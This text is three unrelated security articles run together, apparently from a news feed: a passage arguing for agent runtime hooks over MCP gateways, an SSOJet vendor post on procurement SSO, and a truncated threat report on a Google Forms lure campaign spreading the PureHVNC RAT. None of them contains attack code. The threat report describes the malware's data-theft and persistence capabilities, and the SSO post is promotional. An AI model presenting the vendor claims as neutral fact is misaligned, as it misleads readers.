In practice, MCP Gateways are the </span><b><span data-contrast="auto">wrong abstraction</span></b><span data-contrast="auto"> for securing modern agents.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Let’s look at why.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="2"><span data-contrast="auto">Why MCP Gateways are a Bad Idea</span><span data-ccp-props='{"134245418":false,"134245529":false,"335559738":360,"335559739":120}'> </span></h3><p><span data-contrast="auto">The instinct to put a gateway in front of MCP servers is understandable. It’s the same thinking that gave us firewalls, DMZs, and perimeter security. Put everything behind a checkpoint, monitor what flows through, and enforce policies from one central place.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">We know how that story ends. Perimeter security creates a hard shell with a soft center. Once you’re past the gate, you’re trusted. And in modern systems with APIs, microservices, and distributed agents, there are too many ways past the gate.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">MCP Gateways repeat this mistake at the protocol level. They try to solve a runtime problem with a network control, and that mismatch creates more issues than it solves. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Here’s why they fall short:</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><b><span data-contrast="auto">1. They only cover MCP, not everything your agent can do</span></b><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Gateways only see what goes through MCP. Most real-world agent systems use much more than that. 
They execute shell commands and scripts, call native SDKs and libraries, connect directly to databases, and use framework-specific connectors for tools like Slack, GitHub, Jira, or cloud providers. A risky or buggy workflow does not care whether it uses MCP, a shell, or a built-in connector. From a security perspective, shell access is often far more dangerous than a typical MCP tool.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">If your security model only protects MCP, you are left with big blind spots. You are securing one door while the windows, back door, and garage are wide open.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><b><span data-contrast="auto">2. They introduce a new secret management risk</span></b><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">To work, many gateways require you to route requests, and often credentials, through them. API keys, OAuth tokens, service accounts, and other sensitive secrets may now live in or pass through a third-party system.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Instead of reducing risk, you have just increased the number of places where your secrets exist, the number of systems that could be compromised, and the number of new vendors or services in your threat model. You tried to solve one problem, uncontrolled tool use, and created another, centralized secret exposure.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><b><span data-contrast="auto">3. They lack full agent context</span></b><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Security is all about context. 
To decide whether a tool call is safe, you need to know the user prompt, the agent goal, the session history, what other tools were called before, and whether this call is part of a larger workflow or just a strange one-off. A gateway usually sees something like “Call tool X with arguments Y from client Z.” That is useful but incomplete.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Without full session context, advanced detection is almost impossible. You cannot reliably flag suspicious sequences of actions, distinguish benign calls from data exfiltration, or enforce nuanced, context-aware policies like “only allow this if the user is in group A and the data is tagged B.” You end up with either overly permissive rules or very basic, noisy ones.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><b><span data-contrast="auto">4. They are a single point of failure</span></b><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Most MCP Gateways are built as proxies or reverse proxies. If the gateway is down, misconfigured, rate-limited, or suffering from network issues, your agents are effectively offline.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Instead of building resilient systems, you centralize everything behind one piece of infrastructure that now has to be highly available, low-latency, secure, and correctly configured across all environments. That is a lot of operational overhead for something that is supposed to “just” add security.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><b><span data-contrast="auto">5. 
They are hard to enforce across all clients</span></b><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Even with a perfect design, you still face a major practical problem. How do you force every client and every agent to use the gateway? Agents can run in local developer environments, CI pipelines, different services or microservices, IDEs and notebooks, and on machines you do not fully control. If a client can talk directly to an MCP server, it can bypass the gateway unless you apply strict network and configuration controls everywhere.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">In practice, this often results in some traffic passing through the gateway and some not. You think you have control, but you do not have full coverage. Partial security can be worse than no security because it creates a false sense of safety.</span><span data-ccp-props='{"335559685":720,"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">The good news is that there’s a better approach, one that actually addresses these fundamental problems instead of working around them. If MCP Gateways are the wrong layer, what is the right one?</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="2"><span data-contrast="auto">Runtime Hooks – Securing the Entire Layer, Not Just the Protocol</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":240,"335559739":240}'> </span></h3><p><span data-contrast="auto">The best place to secure agents is inside the agent runtime itself, not at the edge of a single protocol. 
That is where runtime hooks come in.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Hooks are built into the agent framework and trigger whenever tools are used.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Runtime hooks solve the core limitations of gateways as a security guardrail:</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="2" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="1" data-aria-level="1"><span data-contrast="auto">Full coverage across all tooling, not just MCP</span><span data-ccp-props='{"335559738":240}'> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="2" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="2" data-aria-level="1"><span data-contrast="auto">No credential exposure to third parties</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="2" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="3" data-aria-level="1"><span data-contrast="auto">Access to full session and prompt context</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="2" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="4" data-aria-level="1"><span data-contrast="auto">No single point of failure</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="2" data-list-defn-props='{"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="5" data-aria-level="1"><span data-contrast="auto">Easy configuration and rollout</span><span data-ccp-props='{"335559739":240}'> </span></li></ul><p><span data-contrast="auto">Because hooks live at the agent layer, they can see MCP tools, shell commands, native SDK calls, HTTP requests, and framework-specific connectors. If the agent invokes something, a hook can catch it. You are not limited to monitoring just one protocol while everything else runs unobserved.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Hooks also avoid credential exposure because they run inside your environment and inside your agent code. They do not require you to send your secrets to a third party. Secrets remain in your existing systems, no extra proxy or gateway needs to store API keys, and you keep complete control over secret management. Hooks can inspect metadata and arguments without becoming a new storage location for credentials.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Running inside your code and environment provides additional value: hooks can see the full conversation history, the current prompt, the agent state or plan, and previous tool calls in the same session. Your security logic can be truly context-aware. 
You can write policies like “block this call if the user is external and the data is marked internal only” or “alert if the agent chains several export-style tools suspiciously.” This is extremely hard to do from a protocol-level gateway that only sees isolated tool call requests.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Because hooks are typically implemented as part of the agent SDK or runtime, they avoid creating a single point of failure. If a hook fails, you can design it to fail safely, denying only the risky call, or to degrade gracefully while the agent continues to run. You are not routing all traffic through one central network bottleneck. You are adding behavioral controls inside each agent process.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Finally, hooks are easier to deploy and manage. Instead of managing complex network paths and proxies, you enable hooks in your agent framework, configure policies in one place, and ship that configuration with your agents. This is far easier to standardize across teams and environments than enforcing gateways for every client. On top of that, no code changes are required if hooks are integrated at the framework or platform level. Teams can adopt security controls by configuration alone, without modifying each agent implementation.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="3"><span data-contrast="none">MCP Registries: Control at the Source</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":240,"335559739":240}'> </span></h3><p><span data-contrast="auto">Runtime hooks secure how tools are used, but decades of security practice have taught us that good hygiene requires defense in depth. 
You need controls at multiple layers, and one of the most effective is controlling what exists in your environment in the first place.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">This is not a new or novel idea. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">We learned this lesson with package managers, container registries, and API gateways. Allowlists and approved registries prevent unauthorized code and tools from entering your systems, and the same principles should be applied to MCP servers.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">An MCP Registry lets you maintain an allowlist of approved MCP servers in your organization, define which tools are available to which teams or environments, and prevent agents from discovering or using unapproved MCPs.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Combined with runtime hooks, this gives you a strong two-layer model. The registry controls what is allowed, which MCPs and tools exist in your environment, while the hooks control how those tools are used, including policies, context checks, and detections. This applies years of proven runtime security principles to a new attack surface, rather than trying to retrofit network-layer controls that were never designed for this problem.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="2"><span data-contrast="auto">Beyond MCP Security – Securing the Entire Agentic Attack Surface</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":240,"335559739":240}'> </span></h3><p><span data-contrast="auto">MCP is powerful and here to stay. 
It deserves a security model that actually matches how agents work in practice.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">MCP Gateways repeat the mistakes of perimeter security by focusing on a single protocol, while agents are not limited to a single use case. They employ shell commands, native SDKs, database connections, and framework-specific tools. Gateways also introduce secret management risks through centralized credential handling, lack the full agent and session context needed for effective policy decisions, and create both a single point of failure and enforcement challenges across distributed environments.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">We do not need to reinvent security models to secure agentic systems in production. Decades of running complex, distributed systems have already taught us what works and which layers are most critical to secure. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">The answer is runtime hooks combined with MCP registries. Hooks give you full coverage across all tooling, complete session context for policy decisions, no credential exposure to third parties, no central bottleneck, and easy rollout with no code changes when integrated at the framework level. 
</span><br><span data-contrast="auto">This, combined with well-maintained registries, gives you governance and control over which MCPs exist in your environment in the first place.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">The agentic world is evolving too fast to bet on protocol-level controls – secure the agent where it actually runs, not just the protocol it happens to use today.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p>
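The two-layer model the article describes (a registry that decides which MCP tools exist, and a runtime hook that sees every channel plus the session) can be sketched as follows. This is an added example, not code from the article or from any agent framework; every name in it (ToolCall, Session, guard, REGISTRY, the tool and server names, the shell-only-in-dev rule) is a hypothetical assumption.

```python
"""Added illustration: an in-runtime tool-call hook plus an MCP registry check.
Every name here (ToolCall, Session, guard, REGISTRY, ...) is hypothetical."""
from dataclasses import dataclass, field
from typing import Optional

# Layer 1, registry: MCP servers and tools approved per environment (constructed data).
REGISTRY = {
    "prod": {"crm-mcp": {"lookup_customer", "export_contacts"}},
    "dev": {"crm-mcp": {"lookup_customer", "export_contacts"},
            "scratch-mcp": {"run_query"}},
}
EXPORT_STYLE = {"export_contacts", "upload_file", "send_email"}  # tools that move data out
EXPORT_CHAIN_LIMIT = 3  # alert at this many export-style calls in one session

@dataclass
class ToolCall:
    channel: str                      # "mcp", "shell", "sdk", "http", ...
    tool: str
    args: dict
    server: Optional[str] = None      # MCP server name when channel == "mcp"
    data_tags: frozenset = frozenset()

@dataclass
class Session:
    user: str
    user_is_external: bool
    environment: str
    prompt: str
    history: list = field(default_factory=list)  # calls already allowed in this session
    alerts: list = field(default_factory=list)

@dataclass
class Decision:
    allowed: bool
    reason: str = ""

def registry_policy(call, session):
    """Deny MCP tools that are not on the allowlist for this environment."""
    if call.channel != "mcp":
        return None
    approved = REGISTRY.get(session.environment, {}).get(call.server, set())
    if call.tool not in approved:
        return f"{call.server}/{call.tool} is not in the {session.environment} registry"
    return None

def internal_data_policy(call, session):
    """'Block this call if the user is external and the data is marked internal only.'"""
    if session.user_is_external and "internal-only" in call.data_tags:
        return "external user requested internal-only data"
    return None

def shell_policy(call, session):
    """Non-MCP channels reach the same hook; shell is limited to dev (assumed rule)."""
    if call.channel == "shell" and session.environment != "dev":
        return f"shell commands are not allowed in {session.environment}"
    return None

def export_chain_policy(call, session):
    """Alert, without blocking, when the session chains several export-style tools."""
    if call.tool in EXPORT_STYLE:
        count = 1 + sum(1 for c in session.history if c.tool in EXPORT_STYLE)
        if count >= EXPORT_CHAIN_LIMIT:
            session.alerts.append(f"{count} export-style calls by {session.user}")
    return None

POLICIES = [registry_policy, internal_data_policy, shell_policy, export_chain_policy]

def guard(call, session, policies=POLICIES):
    """Run by the agent runtime before every tool call, whatever the channel."""
    for policy in policies:
        try:
            reason = policy(call, session)
        except Exception as exc:
            # Fail safely: a broken policy denies this one call; the agent keeps running.
            return Decision(False, f"{policy.__name__} failed: {exc!r}")
        if reason:
            return Decision(False, reason)
    session.history.append(call)
    return Decision(True)

def demo():
    """Constructed session: an external user in prod making four calls."""
    session = Session("contractor-7", True, "prod", "Summarise the ACME account")
    calls = [
        ToolCall("mcp", "lookup_customer", {"name": "ACME"}, server="crm-mcp"),
        ToolCall("mcp", "export_contacts", {"segment": "all"}, server="crm-mcp",
                 data_tags=frozenset({"internal-only"})),
        ToolCall("mcp", "run_query", {"sql": "select 1"}, server="scratch-mcp"),
        ToolCall("shell", "sh", {"cmd": "ls"}),
    ]
    return [guard(call, session) for call in calls], session

if __name__ == "__main__":
    for decision in demo()[0]:
        print(decision)
```

The shell call and the MCP calls pass through the same `guard`, which is the coverage point the article makes; a policy that raises denies only the call it was evaluating.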

Securing Third-Party Procurement Platforms with Enterprise SSO

  • None
  • Published date: 2026-03-20 00:00:00

None

<h2><strong>Introduction</strong></h2><p>Procurement is no longer a back-office function handled through spreadsheets and manual approvals. Modern enterprise teams depend on a growing stack of third-party tools to manage vendor relationships, purchase orders, contract lifecycles, and spend analytics. As these platforms become more deeply integrated into daily operations, they also become high-value targets for unauthorized access and data exfiltration.</p><p>Enterprise teams often rely on <a href="https://www.procureflow.ai/">software that supports procurement</a> to manage vendors, approvals, and spending workflows. Without centralized SSO and role-based access control, these systems can become a major internal risk surface. When each procurement tool maintains its own authentication silo, security teams lose visibility and control over who has access to what—and that’s precisely the gap that enterprise SSO is designed to close.</p><h2><strong>Why Procurement Platforms Are a Security Blind Spot</strong></h2><p>Most organizations focus their identity and access management (IAM) efforts on core systems like CRMs, ERPs, and collaboration tools. Procurement platforms, despite handling sensitive financial data and vendor contracts, frequently fall outside the scope of centralized security policies. This creates several risks:</p><p><strong>Credential sprawl:</strong> Every standalone procurement tool adds another set of credentials for employees to manage. Weak or reused passwords across these platforms significantly increase the attack surface.</p><p><strong>Orphaned accounts:</strong> When employees leave or change roles, their access to procurement platforms often persists because these tools aren’t integrated into the organization’s identity provider (IdP). 
This results in stale accounts that can be exploited.</p><p><strong>Lack of audit trails:</strong> Without SSO integration, it’s nearly impossible to maintain a unified audit log of who accessed procurement data, when, and what actions they performed. This is a compliance liability under frameworks like SOC 2, ISO 27001, and GDPR.</p><p><strong>Shadow procurement:</strong> Teams sometimes adopt procurement tools without IT or security approval, creating shadow IT scenarios where sensitive vendor and financial data flows through unsanctioned channels.</p><h2><strong>The Role of Enterprise SSO in Procurement Security</strong></h2><p>Enterprise Single Sign-On (SSO) addresses these vulnerabilities by centralizing authentication through a single identity provider. When procurement platforms are brought under the SSO umbrella, organizations gain several critical capabilities:</p><h3><strong>Centralized Authentication and Lifecycle Management</strong></h3><p>With SSO, employees authenticate once through the organization’s IdP (such as Okta, Azure AD, or Google Workspace) and gain access to all authorized procurement tools without separate logins. More importantly, when an employee is offboarded from the IdP, their access to every connected application—including procurement platforms—is revoked automatically. This eliminates the orphaned account problem entirely.</p><h3><strong>Enforced Multi-Factor Authentication (MFA)</strong></h3><p>SSO allows organizations to enforce MFA policies consistently across all connected applications. Instead of relying on each procurement vendor’s native MFA implementation (which may vary in strength or not exist at all), the IdP enforces a uniform authentication standard. 
This is particularly important for procurement platforms where a single compromised account could approve fraudulent purchase orders.</p><h3><strong>Role-Based Access Control (RBAC) Through SCIM</strong></h3><p>Enterprise SSO implementations often include SCIM (System for Cross-domain Identity Management) provisioning, which synchronizes user roles and permissions from the IdP to connected applications. In the procurement context, this means that a finance manager automatically receives approver-level access while a department requester gets view-and-submit permissions—without manual configuration in each tool.</p><h3><strong>Unified Compliance and Audit Trails</strong></h3><p>When all procurement platform access flows through a centralized IdP, security teams get a single pane of glass for monitoring authentication events. This unified audit trail simplifies compliance reporting and makes it easier to detect anomalous access patterns—like a user suddenly accessing procurement data outside normal business hours or from an unfamiliar location.</p><h2><strong>Common SSO Standards for Procurement Integration</strong></h2><p>Not all procurement platforms support SSO out of the box, and the standards they support can vary. Understanding the key protocols helps organizations evaluate procurement tools and plan their integration strategy:</p><p><strong>SAML 2.0:</strong> The most widely supported enterprise SSO standard. SAML-based authentication is XML-heavy but mature and well-understood by IdPs. Most enterprise-grade procurement platforms support SAML integration.</p><p><strong>OIDC (OpenID Connect):</strong> A modern, lightweight alternative to SAML built on OAuth 2.0. OIDC is increasingly adopted by SaaS procurement tools and offers easier implementation for developers.</p><p><strong>SCIM 2.0:</strong> While not an authentication protocol, SCIM is essential for automated user provisioning and de-provisioning. 
It ensures that role changes in the IdP are reflected in procurement platforms in near real-time.</p><p>Organizations evaluating procurement platforms should prioritize those that support at least SAML 2.0 or OIDC, with SCIM provisioning as a strong differentiator for enterprise readiness.</p><h2><strong>Implementation Best Practices for Securing Procurement Platforms with SSO</strong></h2><p><strong>1. Inventory all procurement tools.</strong> Before rolling out SSO, catalog every procurement-related application in use across the organization—including tools adopted by individual teams without IT oversight. This inventory is the foundation for a comprehensive integration plan.</p><p><strong>2. Prioritize by data sensitivity.</strong> Rank procurement platforms by the sensitivity of the data they handle. Tools that process vendor contracts, payment information, or compliance documentation should be integrated with SSO first.</p><p><strong>3. Enforce SSO-only access.</strong> Where possible, disable local authentication on procurement platforms after SSO integration. Allowing password-based fallback creates a bypass that undermines the security benefits of centralized authentication.</p><p><strong>4. Implement SCIM for automated provisioning.</strong> Manual user management in procurement tools is unsustainable at scale. SCIM provisioning ensures that access rights are always current, reducing administrative overhead and eliminating security gaps during role transitions.</p><p><strong>5. Set up conditional access policies.</strong> Leverage your IdP’s conditional access capabilities to add context-aware security layers. For example, require step-up MFA when accessing procurement platforms from outside the corporate network, or block access from non-compliant devices.</p><p><strong>6. Monitor and review access regularly.</strong> Even with SSO and SCIM in place, periodic access reviews are essential. 
Verify that user roles in procurement platforms align with current job functions, and remove access that is no longer justified.</p><h2><strong>What to Look for in an SSO Provider for Procurement Use Cases</strong></h2><p>Not all SSO solutions are built for the complexity of enterprise procurement environments. When evaluating providers, consider the following:</p><p><strong>Broad protocol support:</strong> The provider should support SAML 2.0, OIDC, and SCIM to cover the widest range of procurement platforms.</p><p><strong>Pre-built integrations:</strong> Look for providers that offer pre-configured connectors for popular procurement and spend management tools, reducing implementation time.</p><p><strong>Developer-friendly APIs:</strong> For procurement platforms that lack native SSO support, the provider should offer well-documented APIs and SDKs that enable custom integration.</p><p><strong>Compliance-ready:</strong> The SSO provider should support compliance frameworks relevant to procurement, including SOC 2 Type II, ISO 27001, and GDPR.</p><p><strong>Multi-tenant architecture:</strong> Enterprise teams managing procurement across multiple business units or subsidiaries need an SSO solution that supports multi-tenant configurations without sacrificing security isolation.</p><p>SSOJet is purpose-built for these enterprise requirements, offering SAML and OIDC support, SCIM-based directory sync, and a developer-first API that makes it straightforward to bring even custom procurement platforms under centralized identity management.</p><h2><strong>The Cost of Not Securing Procurement Platforms</strong></h2><p>The financial and reputational risks of leaving procurement platforms outside the SSO perimeter are significant. A compromised procurement account can lead to fraudulent vendor payments, unauthorized contract modifications, or data breaches involving sensitive supplier information. 
Beyond direct financial losses, organizations face regulatory penalties if audit trails are incomplete or access controls are found lacking during compliance assessments.</p><p>The 2023 Verizon Data Breach Investigations Report found that stolen credentials were involved in nearly 50% of all breaches. Procurement platforms, with their access to financial data and vendor ecosystems, represent exactly the kind of high-value target where credential-based attacks do the most damage.</p><h2><strong>Conclusion</strong></h2><p>Securing third-party procurement platforms with enterprise SSO isn’t a nice-to-have—it’s a critical component of modern security architecture. As procurement workflows become more distributed and tool stacks grow more complex, centralized identity management through SSO and SCIM provisioning is the most effective way to maintain control over access, enforce consistent security policies, and meet compliance obligations.</p><p>Organizations that proactively integrate their procurement platforms with SSO reduce their attack surface, streamline user lifecycle management, and gain the visibility needed to detect and respond to threats before they escalate. The question isn’t whether to secure procurement platforms with SSO—it’s how quickly you can close the gap.</p><p><strong>Ready to secure your procurement stack?</strong> SSOJet makes it easy to integrate enterprise SSO across your entire SaaS portfolio—including procurement, spend management, and vendor tools. 
<a href="https://ssojet.com/">Get started with SSOJet</a> today.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://ssojet.com/blog">SSOJet - Enterprise SSO &amp; Identity Solutions</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by SSOJet - Enterprise SSO &amp; Identity Solutions">SSOJet - Enterprise SSO &amp; Identity Solutions</a>. Read the original post at: <a href="https://ssojet.com/blog/secure-third-party-procurement-sso">https://ssojet.com/blog/secure-third-party-procurement-sso</a> </p>
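The periodic access review from the best practices above (orphaned accounts, password fallback left enabled after SSO integration, and roles that exceed what the IdP group grants) can be automated along these lines. This is an added example, not from the original post or from any vendor; the export formats, platform names, users, groups and role names are all constructed assumptions.

```python
"""Added illustration: review procurement-tool accounts against the IdP directory.
All data, field names and role names below are constructed for the example."""
from collections import namedtuple

Finding = namedtuple("Finding", "platform user kind detail")

# Constructed IdP export: who is active and which groups they hold.
IDP_USERS = {
    "amara@example.com": {"active": True, "groups": {"finance-managers"}},
    "ben@example.com": {"active": True, "groups": {"requesters"}},
    "chloe@example.com": {"active": False, "groups": {"finance-managers"}},  # offboarded
}

# Role each IdP group should receive through provisioning, and how roles rank.
GROUP_TO_ROLE = {"finance-managers": "approver", "requesters": "requester"}
ROLE_RANK = {"requester": 1, "approver": 2, "admin": 3}

# Constructed account exports from two procurement tools.
APP_ACCOUNTS = [
    {"platform": "po-tool", "user": "amara@example.com",
     "role": "approver", "local_password": False},
    {"platform": "po-tool", "user": "ben@example.com",
     "role": "approver", "local_password": False},
    {"platform": "po-tool", "user": "chloe@example.com",
     "role": "approver", "local_password": False},
    {"platform": "contracts-tool", "user": "amara@example.com",
     "role": "approver", "local_password": True},
    {"platform": "contracts-tool", "user": "dev-test@example.com",
     "role": "admin", "local_password": True},
]


def entitled_role(user_record):
    """Highest role the user's IdP groups justify, or None if no group maps to a role."""
    roles = [GROUP_TO_ROLE[g] for g in user_record["groups"] if g in GROUP_TO_ROLE]
    return max(roles, key=ROLE_RANK.get) if roles else None


def review(accounts, idp_users):
    """Return one Finding per problem; an account can produce more than one."""
    findings = []
    for acct in accounts:
        platform, user = acct["platform"], acct["user"]

        # Password fallback is a path around SSO, MFA and the central audit trail.
        if acct["local_password"]:
            findings.append(Finding(platform, user, "local-login",
                                    "password fallback bypasses SSO"))

        # Orphaned: the account outlived the identity it belonged to.
        record = idp_users.get(user)
        if record is None or not record["active"]:
            state = "unknown to IdP" if record is None else "inactive in IdP"
            findings.append(Finding(platform, user, "orphaned", state))
            continue  # role comparison is meaningless without a live identity

        # Role drift: the tool grants more than the IdP groups justify.
        # Unknown tool roles rank highest so they are always flagged.
        entitled = entitled_role(record)
        if ROLE_RANK.get(acct["role"], 99) > ROLE_RANK.get(entitled, 0):
            findings.append(Finding(platform, user, "role-drift",
                                    f"has {acct['role']}, entitled to {entitled}"))
    return findings


if __name__ == "__main__":
    for finding in review(APP_ACCOUNTS, IDP_USERS):
        print(f"{finding.kind:11} {finding.platform:14} {finding.user:22} {finding.detail}")
```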

That “job brief” on Google Forms could infect your device

  • None
  • Published date: 2026-03-20 00:00:00

None

<p>We’ve identified a campaign using business-related lures, such as job interviews, project briefs, and financial documents, to distribute malware, including the PureHVNC Remote Access Trojan (RAT).</p><p>It’s not the malware that’s new, but how the attack starts.</p><p>Instead of the usual phishing email or fake download page, attackers are using Google Forms to kick off the infection chain. The attack typically begins when a victim downloads a business-themed ZIP file linked from a Google Form. Inside is a malicious file that sets off a multi-stage infection process, eventually installing malware on the system.</p><h2 class="wp-block-heading" id="h-what-is-purehvnc">What is PureHVNC?</h2><p>PureHVNC is a <strong>modular</strong> <strong>.NET</strong> <strong>RAT</strong> from the “Pure” malware family. In simple terms, it gives attackers remote control over an infected device and lets them steal sensitive information. </p><p>Once installed, it can:</p><ul class="wp-block-list"> <li>Take control of the system and run commands remotely.</li> <li>Collect information about the device, including operating system, hardware, security software, and info about the user and connected devices.</li> <li>Steal data from browsers, extensions and crypto wallets.</li> <li>Extract data from apps like Telegram and Foxmail.</li> <li>Install additional plugins.</li> <li>Achieve persistence in several ways (for example, via scheduled tasks).</li> </ul><h2 class="wp-block-heading" id="h-different-lures-same-goal-compromise-your-device">Different lures, same goal: compromise your device</h2><p>In our research, we found multiple Google Forms hosting links to malicious ZIP files that start the infection chain. These forms are convincing, impersonating real company names, logos and links. 
LinkedIn is one of the platforms used to send links to these malicious forms.</p><div class="wp-block-jetpack-slideshow aligncenter" data-effect="slide" style="--aspect-ratio:calc(711 / 730)"> <div class="wp-block-jetpack-slideshow_container swiper"> <ul class="wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper"> <li class="wp-block-jetpack-slideshow_slide swiper-slide"> <figure><img decoding="async" loading="lazy" width="711" height="730" alt="" class="wp-block-jetpack-slideshow_image wp-image-390399" data-id="390399" data-aspect-ratio="711 / 730" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/google-forms-lure-1.png?w=711"><figcaption class="wp-block-jetpack-slideshow_caption gallery-caption">Fake Google Forms that distribute malicious ZIPs.</figcaption></figure> </li> <li class="wp-block-jetpack-slideshow_slide swiper-slide"> <figure><img decoding="async" loading="lazy" width="716" height="866" alt="" class="wp-block-jetpack-slideshow_image wp-image-390400" data-id="390400" data-aspect-ratio="716 / 866" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/ad-partnership.png?w=716"><figcaption class="wp-block-jetpack-slideshow_caption gallery-caption">The attackers impersonate real companies</figcaption></figure> </li> <li class="wp-block-jetpack-slideshow_slide swiper-slide"> <figure><img decoding="async" loading="lazy" width="678" height="957" alt="" class="wp-block-jetpack-slideshow_image wp-image-390401" data-id="390401" data-aspect-ratio="678 / 957" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/project-details-lure.png?w=678"><figcaption class="wp-block-jetpack-slideshow_caption gallery-caption">Well-known brands are impersonated to lend credibility</figcaption></figure> </li> </ul> </div> </div><p>The forms typically ask for professional information (experience, background, etc.), making them feel like part of a real recruitment or business process.</p><div class="wp-block-jetpack-slideshow aligncenter" data-effect="slide" style="--aspect-ratio:calc(820 / 868)"> <div class="wp-block-jetpack-slideshow_container swiper"> <ul class="wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper"> <li class="wp-block-jetpack-slideshow_slide swiper-slide"> <figure><img decoding="async" loading="lazy" width="820" height="868" alt="Information requested from the user to make the form appear legitimate." class="wp-block-jetpack-slideshow_image wp-image-390225" data-id="390225" data-aspect-ratio="820 / 868" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_82ca84.png?w=820"><figcaption class="wp-block-jetpack-slideshow_caption gallery-caption">Information requested from the user to make the form appear legitimate.</figcaption></figure> </li> <li class="wp-block-jetpack-slideshow_slide swiper-slide"> <figure><img decoding="async" loading="lazy" width="840" height="977" alt="Information requested from the user to make the form appear legitimate." class="wp-block-jetpack-slideshow_image wp-image-390224" data-id="390224" data-aspect-ratio="840 / 977" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/03/image_d751b9.png?w=840"><figcaption class="wp-block-jetpack-slideshow_caption gallery-caption">More information.</figcaption></figure> </li> </ul> </div> </div><p>The forms link to ZIP files hosted on:</p><ul class="wp-block-list"> <li>File-sharing services such as Dropbox, filedn.com, and fshare.vn</li> <li>URL shorteners such as tr.ee and goo.su</li> <li>Google redirect links that obscure the final destination</li> </ul><p>The ZIP archives use various names and are tied to different business-related themes (marketing, interviews, projects, job offers, budgets, partnerships, benefits) to avoid suspicion, for 